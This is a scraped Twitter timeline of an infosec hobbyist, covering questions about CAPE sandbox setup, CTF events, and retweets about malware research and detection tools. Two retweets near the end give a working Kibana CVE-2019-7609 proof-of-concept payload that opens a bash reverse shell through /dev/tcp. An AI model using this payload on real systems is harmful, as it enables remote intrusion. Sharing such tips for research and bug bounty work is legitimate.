vyu

Joined October 2010
13 Mar 2021
@CapeSandbox Do you think it's possible to have the VMs on another server and the CAPE host on another? Been thinking of isolating them like this for testing, instead of building it on a single hardware. Looking through the configs, can't find the right place to modify.
13 Mar 2021
Just to note, I do see it's possible to do this via vmware server's config, esx, xen and such, but let's say I have VirtualBox on another machine, I don't think that's possible, correct? The only way without esx for example, is to have them on a local machine.
13 Mar 2021
However, let's say I want to build CAPE on a VM to begin with, and have another VM on the side, I don't think (also) that the guest CAPE VM will be able to turn on or off the VM guest that is on its side. Just to clarify.
5 Aug 2020
Ayy. Didn't think this would work, but after 2 days of pain (fun), though choppy results a bit it was a pass! Thanks to @_DC818_ and @layer_one for awesome people. Got my first @ANDnXOR badge. Can't wait to science the shit out of this tonight! And of course, #MattDamon
SickPea retweeted
21 Mar 2020
We're covering the last day of @wrccdc today! You can watch here, or join the chat on Twitch! We'll be taking suggestions and answering your blue/red/black team questions in Twitch chat! -> twitch.tv/hardchat

SickPea retweeted
20 Mar 2020
Already at Stage 3: Bargaining
SickPea retweeted
20 Mar 2020
We're covering and streaming @wrccdc today and tomorrow! You can watch here, or join the chat on Twitch! We'll be doing some interesting stuff throughout the competition. twitch.tv/hardchat

SickPea retweeted
🌟v2 of my free Intro to Android App Reverse Engineering workshop is here! 🌟 I've added 3 new exercises, walk-through videos for all 7 exercises, a new module on obfuscation, & exercises on vuln hunting rather than just malware. I hope it helps! maddiestone.github.io/Androi…
SickPea retweeted
21 Oct 2019
I just published an in-depth analysis of how the #Emotet network protocol works. Also I've released a tool which emulated this protocol and is capable of downloading new #modules & #malware from the C&Cs. It's integrated with @hatching_io and @CapeSandbox. d00rt.github.io/emotet_netwo…
SickPea retweeted
A new malware is converting the Discord client into an information-stealing backdoor. This allows it to: * Collect info about the user * Check if payment info is stored * Copy first 50 chars of the clipboard * Execute extra commands from a remote site. bleepingcomputer.com/news/se…
SickPea retweeted
23 Oct 2019
Get to the root of the problem and update Junos OS. Read about Juniper Networks latest advisory at go.usa.gov/xpc7w. #Cyber #Cybersecurity #InfoSec

SickPea retweeted
22 Oct 2019
This obviously means that I release WHIDS v1.6.2 which now integrates with @MISPProject. You can now create detection rules to detect in real time MISP IOCs. #ThreatIntel #SOC #DFIR github.com/0xrawsec/whids/re…
22 Oct 2019
Updated WHIDS release v1.6.2 to fix a silly bug. If you downloaded it yesterday after my talk at @MISPProject Summit, please update ... #ThreatIntel #SOC #DFIR
22 Oct 2019
RT @malwaremustd1e: Post exploitation, from scripts to the frameworks & infrastructure, is relying on code injection, escalation & trace co…
SickPea retweeted
21 Oct 2019
Had no clue about this, as of Python 3.5 you can bundle an entire application into a ZipFile (with a .pyz extension) and execute it directly. This is the equivalent of Java .jar files for Python gist.github.com/lukassup/cf2…
SickPea retweeted
20 Oct 2019
CVE-2019-7609 If you can't pop a shell via the last tweet , you can change poc like 👇 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//') #BugBountyTips #BugBounty #bugbountytip
16 Oct 2019
POC: kibana < 6.6.0 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ') slides.com/securitymb/protot…
SickPea retweeted
21 Oct 2019
Don’t trust anything. Treat public VPN providers as hostile as Tor exit nodes.
SickPea retweeted
16 Oct 2019
MOBEXLER: a Mobile Application Penetration Testing Platform GitHub: github.com/enciphers/Mobexle… Blog post: enciphers.github.io/Mobexler…
13 Oct 2019
Loved my first year at @ShellConLa! Didn't go to any talks, but the workshops were pretty fun. I started the CTF on day 2, should have done it since day 1! Our team got many points in a short amount of time, but the CTF ended 😂 The bonfire was fun as well. See you again next year.